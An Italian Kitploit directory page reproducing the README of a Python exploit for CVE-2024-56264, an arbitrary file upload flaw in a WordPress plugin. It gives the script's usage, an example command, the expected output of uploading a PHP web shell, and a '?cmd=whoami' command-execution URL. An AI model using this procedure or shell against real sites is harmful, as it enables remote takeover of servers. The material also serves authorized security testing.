Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-56264 — Exploit Python per CVE-2024-56264, una vulnerabilità di upload arbitrario di file nel plugin WordPress ACF City Selector <=1.14.0, che consente l'esecuzione remota di codice tramite upload di web shell. | Kitploit
Strumenti/GitHubGitHub/dpakmrya/cve-2024-56264
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

Exploit Python per CVE-2024-56264, una vulnerabilità di upload arbitrario di file nel plugin WordPress ACF City Selector <=1.14.0, che consente l'esecuzione remota di codice tramite upload di web shell.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-56264

WordPress ACF City Selector - Exploit di Caricamento File Arbitrario (CVE-2024-56264)

Panoramica

Questo repository contiene un exploit per CVE-2024-56264, una vulnerabilità di Caricamento File Arbitrario presente nel plugin WordPress ACF City Selector (versioni <= 1.14.0). Questa vulnerabilità consente a un attaccante di caricare un file PHP malevolo (web shell) su un'istanza WordPress vulnerabile ed eseguire comandi arbitrari sul server.

Dettagli CVE

  • CVE ID: CVE-2024-56264
  • Data di pubblicazione: 2 gennaio 2025
  • Plugin interessato: ACF City Selector
  • Versioni vulnerabili: <= 1.14.0
  • Impatto: Esecuzione di codice in remoto (RCE) tramite caricamento di file senza restrizioni

Descrizione

Il plugin ACF City Selector non convalida correttamente i file caricati, permettendo agli attaccanti di aggirare le restrizioni e caricare file PHP arbitrari. Una volta caricato un file PHP malevolo, un attaccante può eseguire comandi di sistema da remoto, portando a un compromesso totale del server.

Requisiti

📌 Dipendenze

Assicurati che i seguenti siano installati prima di eseguire lo script:

  • Python 3.x
  • Modulo requests (Installa usando: pip install requests)

Puoi installare tutte le dipendenze richieste usando:

pip install -r requirements.txt

🚀 Utilizzo

Eseguendo l'exploit:

usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Esempio:

python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Output Previsto

In caso di sfruttamento riuscito, dovresti vedere:

[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Post-Sfruttamento

In caso di successo, accedi alla shell caricata tramite:

http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Questo consente l'esecuzione di comandi remoti sul server.

⚠ Disclaimer

Questo script è destinato solo a scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato è illegale e può comportare gravi conseguenze. L'autore non è responsabile per qualsiasi uso improprio di questo exploit.

Scarica lo strumento